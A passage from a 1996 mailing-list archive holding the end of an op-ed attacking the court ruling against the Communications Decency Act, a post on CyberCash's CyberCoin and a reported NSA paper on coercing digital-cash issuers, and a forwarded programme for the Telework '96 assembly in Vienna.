porn purveyor may intentionally show sexually explicit pictures to a child without legal jeopardy -- provided the purveyor uses the Internet. First in line to challenge the CDA was, of course, the ACLU and its cyberclones, followed by CompuServe, America Online, and others with a huge financial stake in the unenforceability of the CDA, like Playboy and Penthouse. Guccioni may finally claim the consumer market share which he has heretofore been denied. Not only did the Philadelphia panel strike provisions prohibiting adults from posting sexually explicit materials in public areas of the Internet that children frequent -- like teen chat rooms -- but it also struck the prohibition on e-mailing a Penthouse centerfold (or the like) directly to a specific child who is known by the sender to be a child. In the words of the Department of Justice: "Never before in the history of telecommunications media in the United States has so much indecent (and obscene) material been so easily accessible by so many minors in so many American homes with so few restrictions." To say the ruling is flawed is a double understatement. Not only is the decision based on legal theories directly contrary to Supreme Court precedent and incorrect assumptions about the capabilities of Internet technology, but it is less a ruling than a trio of separate opinions. Each judge took his turn chiding Congress for daring to inhibit the liberty of cyberspace pioneers, however ruthless, in the interest of children and the greater cybercommunity. Highlights from the lengthy trilogy include conclusions that it is "either technologically impossible or economically prohibitive" to comply with the CDA, that the term 'indecent' is altogether too vague, and that, "just as the strength of the Internet is chaos, so the strength of our liberty depends upon the chaos and cacophony of unfettered speech." These conclusions defy fact, law, and logic, respectively. Given that some on-line pornographers currently screen and restrict children from their sites, it cannot be said that compliance is impossible. Moreover, new technology is being developed at dizzying speed to address a variety of Internet challenges, such as consumer transaction security and the protection of property rights of amateur musicians who exchange their songs, making it all the more evident that it is really lack of will and not ability which makes Internet advocates cry "foul." As to expense, this callous court complains about the economic burden the CDA would impose on distributors of pornography, while finding it good and proper for parents alone to incur the costs, however great, of protecting their children. Outside the sacred realm of cyberspace, distributors of pornography routinely incur expenses to shield children. To cite just one example, "blinder racks" must be purchased and installed at newsstands so that children do not see offensive sex magazine covers. This economic burden flows directly from the legal responsibility these distributors bear to shield this material from minors. Software blocking programs, on the other hand, are initially expensive for parents, need frequent updating (at considerable expense), are easily circumvented by computer-savvy kids, and are simply incapable of screening much of the pornography. Surfwatch, the leading software blocker, admitted in the CDA hearing to missing up to 800 sexually explicit sites each month! Moreover, it goes without saying that a software blocking program can only work on a family's home computer where it is installed. What happens when the kids go next door or, for that matter, to the public library? The American Library Association proclaimed in the Philadelphia court that, as a matter of solemn principle, it will never employ software screening programs in its libraries' computers -- not even when children use them. This to-hell-with-children sentiment is reflected by the judges and echoes throughout their opinions. Chief Judge Sloviter's opinion even concludes that for "content providers . . . to review all of their material" to determine which of it is sexually explicit is surely "a burden one should not have to bear." What? The content provider is in the best position to determine whether his material contains patently offensive depictions of sexual or excretory activities, and that is why our laws have always required him to do just that. The allocation of this burden to the speaker, as opposed to the consumer of the speech, not only carries the weight of unanimous legal precedent, but also has the benefit of being practical. It is virtually a truism to say that, as between speaker and consumer, the speaker is in the better position to know the content of his speech. Judge Sloviter would remove a reasonable burden from content providers and replace it with the enormous and nearly impossible burden on parents to first locate, then evaluate, and then block pornographic material in an effort to protect their children. Their quarrel with the indecency standard reveals that the judges are either ill-informed or ill-intentioned. An indecent communication is one "that, in context, depicts or describes, in terms patently offensive as measured by contemporary community standards, sexual or excretory activities or organs." This definition has been consistently upheld in every case in which it has been reviewed, including at the Supreme Court, which, most recently in the cable pornography case of Denver Area Educational Telecommunications Consortium, Inc. v. FCC, held the standard to be "not impermissibly vague." As if to justify their awkward conclusion, the court lists as examples of "threatened" speech material which simply could not fall within the definition of indecency, such as discussions of recent movies or ancient Indian statues or articles about human rights violations. To serve their end, the judges conveniently, but not subtly, ignore the requirement that the materials be evaluated "in context." No court has ever construed this standard to encompass, without any consideration of context, all material of literary or artistic value that is somehow related to sexuality. Not to be topped, Judge Dalzell proclaims: "Any content-based regulation of the Internet, no matter how benign the purpose, could burn the global village to roast the pig." Really? What about fraud -- may we not protect consumers in cyberspace? May we not ban child pornography or enforce copyright violations on-line? Would these content-based regulations burn the village, too? If the First Amendment's promise to this new technology is indeed chaos and anarchy, then perhaps Judge Dalzell is right. But before we too quickly agree with this visionary from the federal bench, we ought to ask ourselves how we have survived and thrived as a democracy for two centuries upon the bedrock of ordered liberty, the enemy of chaos and anarchy. The Supreme Court ought to roundly denounce this federal panel's decision. To affirm it would be to rob our children of the opportunity to participate in this great new communications medium, or worse, to sacrifice them to perversions and excesses for the convenience and pleasure of the worst malefactors on-line -- in effect, to preserve the pornographers' new found sanctuary known as cyberspace. -- 9/9/96 Cathleen A. Cleaver, Esq. is Director of Legal Studies at the Family Research Council, a Washington, D.C.-based research and educational organization. Miss Cleaver has extensive experience in pornography litigation and legislation. ### From rah at shipwright.com Mon Sep 30 18:28:17 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 09:28:17 +0800 Subject: e$: NSA Fluffy FUD? Message-ID: -----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL----- I just got off the phone with a reporter who was interviewing me for a comment in the paper on Cybercash's "CyberCoin" mini-money protocol. My comment was that I hadn't paid much attention to it, because I figured it was yet another book-entry system, but, since he e-mailed me ahead of time, I went to look at their FAQ on the web, and, yup, sure enough, it was yet another book-entry system. :-). For the record, I have no problems with Cybercash, themselves. If anyone's going to do a book-entry system, it might as well be Cybercash. What? What about CyberCoin? Oh. Yeah. CyberCoin. Well, the best way I can figure, it's a transaction accumulator for either your credit card or debit card, like First Virtual does for small transactions, only it settles way much quicker, like less than 90 days. :-). On the privacy standpoint, it hides transactions from the merchant, which is cool, but not from the bank, which is not cool. What do you expect from a book-entry system? ;-). Cybercash at least makes no claims for anonymity, unlike other transaction systems who will remain nameless... Cybercash is at if you want more details. Almost as an afterthought, the reporter said that someone at the NSA had cranked out a for-public report, which he had just gotten a fax of, decrying the succeptability of digital bearer certificate issuers in general, digital cash issuers in particular, to rubber-hose attacks on their private keys. The "Print off a trillion dollars in digimarks, buddy, or we'll kill 'Fluffy', your cat, here..." scenario. Maybe we can call it a Fluffy-the-cat attack... The first time I heard of this old chestnut, of course, was from the lips of Nathaniel Borenstein, who was pushing First Virtual rather strenously at the time, as a solution to that problem, among others, up to, but not including, dandruff and world peace. This was before he invented the keyboard sniffer, so I was actually listening to him, in those days. :-). Now it seems the NSA has picked up the Nathaniel's fumbled ball and is running with it for all they're worth. Of course, the best way to deal with this from a technical standpoint is not technically, of course, but with a market model: one with lots of issuers, trustees, protocol designers, software developers, buyers and sellers, in one great big robust, happy, many-to-many competitive clusterfuck of digital commerce. Not to mention, of course, expiry dates on the digital bearer certificates itself. Anyway, has anyone *else* seen this apocryphal NSA paper yet? Is it on the web? I'm sure (he said, volunteering someone else's services unasked yet again) that someone like John Young would be interested in seeing that fax... So, the reporter asks, do I think that Citicorp should get into the business of issuing digital cash? Well, I guess not. Not according to the NSA, anyway, especially if John Reed has a cat named 'Fluffy'. Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE-----BY SAFEMAIL----- Version: 1.0b3 iQCVAwUBMlBBLfgyLN8bw6ZVAQENFQP9HKP1TdH27b7e2oruWFK1uc/aALOWPPUy jU+zCS+xUgYwdTlFiI2+6xD/jiylU9Twf6rgX63NQ3JNl1rQhmVW8wIhArgbakkg 3/zxWeMJ+Bc/1N0t+XsHdB3MQ07HygaPyjKED73Exy2uO60XuY8Je2isM4fr2B4d 85OeDCb606Q= =61Gj -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 18:50:52 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 09:50:52 +0800 Subject: 3rd European Assembly on Telework and New Ways of Working Message-ID: <01IA3EDBZEQA8Y57AQ@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 25-SEP-1996 00:10:23.83 From: Phil Agre X-URL: http://communication.ucsd.edu/pagre/rre.html X-Mailing-List: archive/latest/1317 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 24 Sep 1996 08:31:26 +0200 From: brennert at sun1.alpin.or.at (Barbara Rennert-Buchegger) [...] Preliminary Programme Telework '96 3rd European Assembly on Telework and New Ways of Working WORKING IN A WIDER EUROPE November 4 - 6, 1996, City Hall, Vienna, Austria organized by European Community Telework Forum (ECTF) in association with European Commission City of Vienna Federal Ministry of Science, Transports and the Arts Chamber of Labour of Vienna European Trade Unions Confederation Austrian Trade Unions Confederation --------------------------------------------------------------- Patronage Thomas KLESTIL - President of the Federal Republic of Austria Honorary Presidency Martin Bangemann - European Commission, Commissioner of DG XIII (Belgium) Rudolf SCHOLTEN - Federal Minister of Science, Transport and the Arts (Austria) Michael HAeUPL - Mayor of the City of Vienna (Austria) Hannes SWOBODA - Councillor for Urban Planning and Foreign Affairs (Austria) Assembly Co-ordinator Josef HOCHGERNER - Centre for Social Innovation, ECTF (Austria) Programme Chair Enrique de la SERNA - INNOVA Intl., ECTF (Italy) Christine GAUTHIER - CATRAL (France) Franz NAHRADA - Globally Integrated Village Environment, CSI (Austria) Assembly Steering Committee Katarina ALMQUIST - NUTEK/Assembly Co-ordinator 1997 (Sweden) Eduardo BARRERA CORTEZ - INMARK, ECTF (Spain) Karl BONOMEO - TeleVillage Bruck an der Leitung (Austria) Bruno BUCHBERGER - Softwarepark Hagenberg (Austria) Renate CZESKLEBA - Austrian Trade Union Confederation (Austria) Philippe DORIN - CATRAL (France) Charles GRANTHAM - ISDW & CSI (USA) Noel HODSON - SW 2000, ECTF (United Kingdom) Arnold KLOTZ - Planning Director of the City of Vienna (Austria) Brigitta MLINEK - Chamber of Labour of Vienna (Austria) Jack NILLES - JALA, ECTF (USA) Walter PAAVONEN - ECTF (Sweden) Andrew PAGE - ECTF (United Kingdom) Ingolf SCHAeDLER - Federal Ministry of Science, Transport and the Arts (Austria) Alain VEYRET - IDATE, ECTF (France) European Commission Peter JOHNSTON - DG XIII Maarten BOTTERMAN - DG XIII European Trade Unions Confederation (ETUC) Emilio GABAGLIO --------------------------------------------------------------- Organization European Community Telework Forum ECTF Austria Secretariat Center for Social Innovation CSI Hettenkofergasse 13 A-1160 Wien Tel. +43-1-495 04 42-41 Fax +43-1-495 04 42-40 eMail j.hochgerner at magnet.at ECTF International Secretariat Santa Cruz de Mercenado, 33 E-28015 Madrid Tel. +34-1-541 72 64 Fax +34-1-559 92 74 eMail eb.ectf at mad.servicom.es Conference Secretariat bco - j. breit congress organisation GmbH Lenaugasse 11/36 A-1080 Wien Tel. +43-1-403 28 20 Fax +43-1-406 77 52 eMail bco.breit at magnet.at ATTENTION: As of Monday, November 4, 1996, the conference secretariat will be located at the congress venue (City Hall). Hotel reservation and travel arrangements Austropa - Interconvention P.O.Box 30 A-1043 Wien Tel. +43-1-589 25-114 Fax +43-1-586 71 27 eMail austropa at oevb.co.at Telework '96 on the Web http://www.bco.co.at/bco/tw96/ The ECTF-HomePage on the Web http://www.agora.stm.it/ectf/ectfhome.html --------------------------------------------------------------- Preface Rudolf ScholtenFederal Minister of Science, Transport and the Arts The diffusion of telework is among the central phenomena characterizing the contemporary technical and economic developments at a global state. Faced with the restructuring of labour-markets and work, and witnessing the rapidity of innovation within the information society it is the task of the responsible analyst to consider the social impact of telework detached from either technological euphoria or resigned cultural pessimism. In parallel to the growth of a worldwide net and the trends toward the liberalisation of the telecom-markets the promotion of telework provides us with seductive visions: Among others there is the promise to harmonize classical antagonisms like those between urban and the rural areas or between work and leisure-time. Accordingly teleworkers may expect a sheltered life in the idyl of the village environment or the fond of the family whilst being mobile beyond national borders at the same time. There is the assumption that women in particular will no longer be threatened by breaks of their professional careers. Companies are expected to increase profits due to increased productivity and organisational innovation. Positive effects on the labour-market and the natural environment are likewise foreseen. No doubt telework bears chances for the future. Nevertheless, we should not forget to take possible disadvantages into account: For example, the mingling of work and private sphere, relevant for mere homebased work, can be a factor of increased individual mental stress. The creation of new patterns of work might be connected with the loss of old types of jobs. Tendencies toward individualisation and the decline of social solidarity might be intensified. Issues like labour legislation and the threatening decrease of social security urgently need to be discussed. If we were to describe the situation as an open game of chances and risks, a demand for creative policies to shape our future prospects positively and consciously gains evidence. This demand shall be met by "Telework 96": The exchange of experiences between science and policy-makers, industry and trade unions is organized not only in order to analyse the present situation, but also with a view of preparing solutions for the near future. "Working in a Wider Europe" may be read in a twofold way: as referring to an extension of individual life perspectives as well as a metaphor for the promotion of the process of the European integration, whereby the countries of Central and Eastern Europe (CEE) will be of particular interest. The use of advanced technology and traditional ways of decision-making can not be mentioned without referring to mechanisms of exclusion. In contrast, within and around "Telework 96" a wide range of events are organized for adressing various types of institutions and groups of special interest, including pupils, female workers, and persons in search of employment. Rudolf Scholten --------------------------------------------------------------- About the Assembly Focus: European integration, particularly Central and Eastern Europe; transnational standards for telework Main topics: Getting people to work; Training for life in the Information Society; Working towards sustainability Format: Scientific conference & political assembly & exhibition of applications and cases Participants: Leading international experts, practitioners, scientists, politicians, representatives from business, trade unions and public administration and NGO's Telework 96 provides the largest and most comprehensive platform to both observe and promote progress of teleworking in Europe. It is the lead event of the European Telework Week 1996 (ETW 96), which is held under the auspices of the European Commission (DG XIII) from November 4-11, 1996. It is called an "assembly" because of its composition comprising elements of a scientific conference with political debates and of a business exhibition as well. Companies, regional councils, telework pilots (e.g. tele-cottages) and other institutions are invited to participate in an exhibition which is open to the public. Conference meetings in plenaries and parallel sessions are open to experts and representatives of basicly five major societal players in the field: (1) Employers (companies, associations of industrialists, Chambers of Commerce) (2) Employees (Trade Unions, Shop Stewards, Chambers of Labour, associations of teleworkers) (3) Politics (from communal, regional, national to European and transnational level, particularly the Inter-Parliamentary Special Interest Group) (4) Science (experts and analysts of many kinds, consultants and researchers from private and public research centres, universities and international institutions) (5) NGO's (e.g. environmentalist groupings, women's organisations, youth groups). Public administration on municipal, regional, federal or European level of course also plays a role which may e.g. in one case appear in the area of politics or in another in that of the employers. In the overall format speakers of the assembly are selected and invited representatives of these groups. Participants of course will represent an even wider spectrum and will have in many regards concurrent and additional knowledge and experience in the themes the assembly deals with. Hence methods and procedures will be imposed to prevent the assembly from becoming a sort of closed shop where experts, known to each other quite well, tell experts what is the experts expertise. Instruments in this regard are: + Careful selection of speakers in the opening event (Monday evening), the plenaries and the parallel track sessions both on Tuesday and Wednesday. + Offering an "Open Forum (OF)" concerning the three main topics (track 1: Work, track 2: Training; track 3: Sustainability). This allows interested observers and participants to send in abstracts and posters about their work (be it in research, teleworking pilots, publishing etc.). These contributions will be taken care of by the scientific organizers in the following way: Besides the abstracts of the invited lectures contributions to the OF will be listed in the Preceedings; in each of the track sessions a discussion will be held on how to best publish and further proceed with these pools of knowledge; the "posters" will be exhibited, and the abstracts of written contributions will be distributed during the assembly; publication will be offered on the web (Telework 96 homepage) and a selection of the most relevant contributions will be printed after the event as "Proceedings 2" apart from the lectures of invited speakers ("Proceedings 1"). + The invention of a "Worker's Tele-Corner": A dedicated workplace in the conference area is connected to a server, bearing all the information brought in through the OF, allowing interested people from around the globe to share information on their teleworking experiences, needs and maybe marketable results. Further to that there will be links not only to the Telework 96 and ECTF homepages, but also to the ETW website http://www.eto.org.uk (e-mail: etw96-info at eto.org.uk), ACTS and Telematics projects networks, and various databanks (building up an "electronic environment" of Telework 96). + Teleconferencing between the major events within the assembly and other European conferences operated within the European Telework Week. + Arranging "additional events" in Vienna, stimulated by Telework 96 and being also integrated in the framework of the European Telework Week. + Allowing manyfold concertation meetings among telework oriented European research and development projects. Josef Hochgerner, Assembly Co-ordinator Vienna, June 1996 --------------------------------------------------------------- General Information Conference fee until September 30, 1996: Participants ATS 6.300,-- / 480,-- ECU Students ATS 2.000,-- / 155,-- ECU(Confirmation of the university has to be enclosed) Day Tickets ATS 4.000,-- / 310,-- ECU after September 30, 1996: Participants ATS 7.200,-- / 550,-- ECU Students ATS 2.400,-- / 185,-- ECU (Confirmation of the university has to be enclosed) Day Tickets ATS 4.000,-- / 310,-- ECU Reduced fees (e.g. for members of non profit organizations or participants from Central and Eastern Europe) are available on request.Press representatives: Please contact the conference secretariat to receive an accreditation. Fee includes Participation in all lectures and sessions, two lunches, coffee breaks, cocktail reception, programme, abstract book and proceedings. Evening reception Upon invitation by the Mayor of Vienna. Payment The fee is payable in international money order to: ECTF Austria - "Telework 96" Account Nr. 784 070 377 Bank Code 20151 Bank Austria, Box 35, A-1011 Vienna without charges for the beneficiary or enclose a cheque to your registration (ATS 2.500,-- maximum per cheque). Confirmation of registration only after receipt of payment! If you pay the fee per bank transfer after October 1, 1996 and do not receive a confirmation of registration, please bring a copy of the money transfer with you. Cancellations Cancellations made prior to October 1, 1996 will be charged 50% of the assembly fee (only written cancellations can be accepted). We regret that after this date no cancellations can be accepted. Exhibition In the course of the assembly an exhibition presents the most advanced technologies and services to support individuals and organi-zations who are already or wish to start teleworking. It will be open to the assembly audience as well as to the public. The exhibition will take place in the City Hall around the conference rooms. Information about participation is available at the conference secretariat. Poster Presentations and Contributions to the "Open Forum" Poster presentations and abstracts to the "Open Forum" will be accepted until September 30, 1996. Please use the abstract form for sending your submission. Poster size: Max. 90 cm width, 140 cm height. Only participants of the conference can present a poster. Poster presentation does not result into any reduction of the conference fee. Venue The Vienna City Hall ("Rathaus") is located in the heart of the city close to the "Ring". It can be reached by underground (U2, station "Rathaus") and tram (D, 1, 2, station "Rathausplatz, Burgtheater"). Languages Plenary sessions will be interpreted from and into German, English and French, the parallel sessions will be held in English. Badges Please note that the badges will be needed for access to all scientific and included social events of the conference. Parking In the area around the City Hall parking is only allowed for max. 90 minutes with a special ticket. It is recommended to park cars in one of the garages close to the congress venue. Airport The Vienna International Airport is located about 16 km from the city centre. >From the airport the city can be reached - by the airport bus (ATS 70,-- per person) to "City Air Terminal" at the Hotel Hilton - by Railway / "Schnellbahn" (ATS 34,-- per person) to the station "Wien Mitte" - by cab (ATS 400,-- - 600,-- per cab) Climate In November the weather in Vienna is cool, but usually not unpleasant. It is recommended to take warm clothes with you. --------------------------------------------------------------- Programme Monday, November 4, 1996 08.00 Registration 09.00 - 17.00 Concertation meetings of European projects on teleworking: 1) ACTS-Concertation Meeting of the GA Telework Chain, involving particularly DIPLOMAT (ACTS 10095, "The European Charter for Telework") and ETD (ACTS 10081, "European Telework Development"). Partners/representatives of other ACTS projects related to telework are invited to participate. 2) Telematics programme, particularly telework oriented TURA-projects ("Telematics for Urban and Rural Areas") will be invited to participate in a "trans-programme" communication to exchange experiences and further exploitation of results across the programmes. 3) Established contacts to DG V and the European Foundation for the Improvement of Living and Working Conditions will lead to their presence in this meeting too; transfer of knowledge is enhanced among the DG's involved and projects started within the Community Initiatives (ADAPT, EMPLOYMENT). Particularly the High Level Expert Group of DG V ("Flynn Commission") is invited to participate. Meeting rooms and communication facilities are available to be arranged according to demand. The City of Vienna offers technical assistance to this meeting as well as regarding "Telework 96", because the municipality of Vienna itself participates in several European projects and took on the "Bangemann Challenge". Thus the informatics department will use the Telework Assembly as a demonstrator of its ability of networking and building an electronic environment for the conference. This will apply also to some of the additional events which will take place during the ETW, and secure permanence of information and communication technologies implementation (teleworking facilities) set up to enhance the success of Telework 96 and further achievements of the European Telework Week. 18.30 Welcome Cocktail Welcome Address: Andrew PAGE - President of the ECTF (United Kingdom) 19.30 Evening Opening Event "Tele-Future Without Work?" Rudolf SCHOLTEN - Federal Minister of Science, Transport and the Arts (Austria) Michael HAeUPL - Mayor of the City of Vienna (Austria) (R) Andrew MILLER - Member of the British Parliament (United Kingdom) Upon invitation by Telework 96 and the City of Vienna prominent speakers will present their view on the conference topics from various points. --------------------------------------------------------------- Programme Tuesday, November 5, 1996 PLENARY SESSION "European Dimensions of Teleworking" Moderation: Josef Broukal - ORF / Austrian Broadcasting Corporation (Austria) 09.00 - 09.20 Hannes SWOBODA - Councillor f. Urban Planning and Foreign Affairs (Austria) Cities and the new division of labour in Europe 09.20 - 09.40 Robert VERRUE - Europ. Commission, Director General of DG XIII (Belgium) European policies on telework 09.40 - 10.00 Discussion period 10.00 - 10.30 Etele BARATH - Member of the Hungarian Parliament (Hungary) Building the European Information Society - the Hungarian perspective 10.30 - 11.00 Shalini VENTURELLI - American University, Washington D.C. (USA) The policy design of the global Information Society Economic, political and cultural dimensions 11.00 - 11.20 Coffee Break 11.20 - 12.00 Keynote Address by Wouter VAN DIEREN - Institute for Environment and System Analysis (Netherlands) 12.00 - 12.30 Discussion period 12.30 - 14.00 Lunch Break Lunch will be served in the City Hall close to the conference rooms 14.00 - 18.00 TRACKS 1 - 3 (see following pages) 19.30 Evening reception upon invitation by the Mayor of Vienna Videoconference with representatives of Prague and Budapest and corresponding events within the European Telework Week. Cocktail reception: Specialities from Austria, Hungary and the Czech Republic --------------------------------------------------------------- TRACK 1 GETTING PEOPLE TO WORK Tuesday, November 5, 1996 14.00 - 17.30 Wednesday, November 6, 1996 09.00 - 10.45 Restructuring national as well as international labour markets and unemployment will remain top political issues of the next years. Telework '96 will highlight the impact of telework and its legal aspects within new organisational frames of companies, strategic alliances, civic cooperation (NGO's) and private-public partnership. Transnational teleworking may weaken national power. Thus cultural borders and new balances will also appear in the scope of the conference. Co-ordinators: Renate CZESKLEBA - Austrian Trade Unions Confederation (Austria) Andrew MILLER - Interparliamentary Special Interest Group (United Kingdom) Preliminary List of Presentations and Contributions Eduardo BARRERA CORTEZ - INMARK, ECTF (Spain) Towards a European employment agency for teleworkers Willy BUSCHAK - European Trade Unions Confederation (Belgium) Xavier DARMSTAEDTER - President of the Belgian TeleWorking Association, Managing Director of Fischer & Lorenz Benelux (Belgium) Can telework generate employment? - The role of Teleworking Associations Ante JAMTLID - VINDUE (Sweden) / Nathalie FAY - ISDW (USA) Creating job opportunities by telework development joint venture Peter JOHNSTON - Europ. Commission, DG XIII, Head of Unit (Belgium) A Vision for 2010 Georg KAPSCH - Kapsch AG (Austria) Jens KITTELSEN - European Commission, DG V (Belgium) Nicole TURBE-SUETENS - Syntaxia (France) Telework and labour relations Foundation for the Improvement of Living and Working Conditions (Ireland) European RTD-projects on teleworking (DIPLOMAT, ETD, DEMETER, MIRTI, TECODIS ...) Open Forum - Discussion --------------------------------------------------------------- TRACK 2 TRAINING FOR LIFE IN THE INFORMATION SOCIETY Tuesday, November 5, 1996 14.00 - 17.30 Wednesday, November 6, 1996 09.00 - 10.45 New ways of teaching, learning, vocational training and continuous education are indispensable prereqisites of socially and economically desirable modes of teleworking. Main topics within this session will be interactive distance learning, knowledge bases and the use of intellectual capital. International links and networks of "virtual colleges" will become enhanced by Telework '96. Co-ordinators: Ina WAGNER - University of Technology (Austria) Noel HODSON - SW 2000 (United Kingdom) Preliminary List of Presentations and Contributions Brendan McCARTHY - Victoria University of Technology, Melbourne (Australia) Learning experiment on teleworking with students Andrew FRAYLING - Protocol Ltd. (United Kingdom) IPR - Intellectual property rights and the issues facing the teleworker Charles GRANTHAM - Institute for the Study of Distributed Work (USA) Using new ways of work to create intellectual capital Sigram SCHINDLER, Marc BUCHMANN - Teles GmbH Berlin (Germany) ICARE 9000: A Teletraining Platform for SME's to gain the ISO 9000 Certification Invited speaker of the University of Oxford (United Kingdom) Interactive Distance Learning (IDLE) in Oxford Johann GUeNTHER / Angelika VOLST - Donau University (Austria) TELEMACHOS: Teleuniversity for telematics management Commercial Training Centres Open Forum - Discussion --------------------------------------------------------------- TRACK 3 WORKING TOWARDS SUSTAINABILITY Tuesday, November 5, 1996 14.00 - 17.30 Wednesday, November 6, 1996 09.00 - 10.45 Further implementation of tele-centres and urban telematics creates a new notion of community, both in cities and rural areas. This entangles a series of social issues and paradox interventions. A changing environment may evolve in the wake of the distribution of innovative forms of communication and transportation. Particularly regarding countries in CEE the eventual availability of "shortcuts to sustainability" will be addressed. Co-ordinators: Franz NAHRADA - Globally Integrated Village Environment/CSI (Austria) Katarina ALMQUIST - NUTEK (Sweden) Preliminary List of Presentations and Contributions Eric BRITTON - EcoPlan International (France) Sustainability - from thought to action Mats ENGSTROeM, Walter PAAVONEN - Nordplan (Sweden) Sustainable principles for working organizations Michael ERTEL (Germany) Health and safety aspects of teleworking Maria FISCHER-KOWALSKI - Institute for Interdisciplinary Research and Continuing Education (Austria) Societal Metabolism Michel GIRAUD - Isle de France Neighbourhood Offices Network (France) Distance working - An asset for sustainable development? Reza KAZEMIAN - University of Stockholm (Sweden) Telematics on the societal and spatial structures of cities and their hinterlands A Project for sustainable location design Robert PESTEL - European Commission (Belgium) Sustainability in the information society? F.J. RADERMACHER - Forschungsinstitut fur anwendungsorientierte Wissensverarbeitung (Germany) Stable paths into a sustainable world Open Forum - Discussion --------------------------------------------------------------- Programme Wednesday, November 6, 1996 09.00 - 10.45 Continuation of Tracks 1 - 3 09.00 - 10.45 Parallel Meeting of the European Inter-Parliamentary Special Interest Group 10.45 - 11.00 Coffee Break PLENARY SESSION Moderator: Marion FUGLIEWICZ - Communications Consultant (Austria) 11.00 - 12.00 Reports from Tracks 1 - 3 and the Inter-Parliamentary Special Interest Group 12.00 - 12.30 Discussion period 12.30 - 14.00 Lunch Lunch will be served in the City Hall close to the conference rooms 14.00 - 16.00 Round Table Discussion: Political Implications Representative of the Austrian Government Ines UUSMAN - Minister of Transport and Communication (Sweden) European Ministers for Telecom, Work and Social Affairs Representatives of Central and Eastern European Countries Fritz VERZETNITSCH - President of the European Trade Unions Confederation Senior Industrialists European Parliament High Level Expert Group of DG V European Commission Opera, Theater or Concert tickets for your last evening in Vienna On request Austropa Interconvention provides opera, theater or concert tickets. Programmes are available one month in advance. Tickets can be confirmed the earliest 1 month prior to the performance. Prices depend on the seat category and cast. Ticket prices for the Viennese State Opera range from ATS 350, to ATS 2300,, for Musicals from ATS 310, to 1200,, for concerts and other plays from ATS 300, to 850, plus 25% per ticket advance booking fee. On November 6, 1996, tickets are available for: Vienna State Opera - Stifelio by Giuseppe Verdi - Carreras, Zampieri, Bruson Please note: Due to this special performance tickets will not be available at regular rates (supplement of approx. 40-50%). We have to point out that for this performance only a very small number of tickets will be available. Volksoper: Land des Laechelns by Franz Lehar Musicals: Theater an der Wien: Elisabeth (in German) Raimund Theater: Beauty and the Beast (in German) --------------------------------------------------------------- Additional Events >From Wednesday, 6th of November, onwards a series of relevant workshops, discussions, professional assemblies and promotion activities about teleworking will take place to address a broad local public . These events will be organized by institutions (e.g. Trade Unions or the Chamber of Commerce, schools), existing tele-centres and tele-houses or companies, associations and NGO's, addressing pupils, female workers, unemployed, and people who are looking for new jobs or alternatives to their current working situation. Preliminary List of additional events of Telework 96 Austrian Network of Women (Oesterreichisches Frauennetzwerk) - Workshop "Women on the Data-Highway" Trade Union of Service Industries (Gewerkschaft der Privatangestellten, GPA) - p.r. activities for collective and in-company agreements on Teleworking Telecentre Autokaderstrasse, Vienna - Open House Telecentre of Kapsch AG, Vienna - Open House Ericsson - Open House Federal Ministry of Education/Educational Council of Vienna - Essay Competition among pupils Tele-House Ltd. of Lower Austria - Local Demonstrators Telecentre Bruck - Planning Workshop Telecentre Hermagor - Planning Workshop Telecentre Pinkafeld - Planning Workshop --------------------------------------------------------------- Accompanying Persons' Programme (Optional Tours) Vouchers for optional tours will be handed over to the participants/accompanying persons at the AUSTROPA INTERCONVENTION DESK. AUSTROPA INTERCONVENTION reserves the right to cancel tours should the minimum number of people not be reached. Tuesday, November 5, 1996 City Tour: "Historic Vienna" including a visit to the Schoenbrunn Palace Departure from the Rathaus at 9 AM, duration approx. 3 This tour gives an overall view of the city and also leads to some prominent sights. Driving along the Ringstrasse, a circular boulevard of 4 kilometers, which was built during mid last century, one can see many impressive buildings, such as the State Opera, the Burgtheater, various Museums, the Parliament, the City Hall and the University. The highlight of the tour is the visit to the Schoenbrunn Palace, the summer residence of the Austrian Emperors. Price per person, incl. bus tour, guide and entrance fee ATS 320, Minimum of 25 people per bus Excursion: "Kahlenberg - Klosterneuburg" Departure from the Rathaus at 2PM, duration approx. 3 hours On the way to the Danube the bus drives through the north eastern part of the city offering a magnificent view of the hills surrounding Vienna, the so called "Wienerwald". Via the scenic route and passing through some well-known Heurigen villages, you reach the Kahlenberg. This lookout offers a good view of the entire city. The bus tour continues to Klosterneuburg, the first residence of the Babenberg family in the area of Vienna during the early medieval times. The most prominent site to visit is the Abbey of the Augustinian Friars, founded before 1108. The unique romanesque Verdun Altar with its 51 enamelled tablets by Nikolaus von Werden, dated 1181, is the most valuable piece of art in the abbey. Price per person, incl. bus tour, guide and entrance fees ATS 290, Minimum of 25 people per bus Wednesday, November 6, 1996 Arts and Crafts in Vienna Departure from the Rathaus at 9.30AM, duration approx. 2 The "Augarten" Porcelain Manufactory was established in Vienna as early as 1718. Many of the common designs still have their origin in the times of Empress Maria Theresia who recognized the importance of creative craftsmanship for economy. You will be guided through the production area and the adjacent showroom. The Museum of Applied Arts, recently renovated, houses a large collection of furniture, glass and objects for daily use from baroque times to the beginning of the 20th century. Particularly interesting are cutlery, jewellery etc. by Kolo Moser, all types of chairs by the Thonet Brothers and designs by Josef Hofmann. Price per person, incl. bus tour, guide and entrance fees ATS 320, Minimum of 25 people per bus Imperial Vienna: Treasury and Imperial Burial Vault Meeting place: Rathaus at 2PM, duration approx. 2 The treasury is the oldest part of the Hofburg, mentioned already in the 13th century and contains a display of priceless treasures that bears witness to the former imperial power: insignias and jewels over 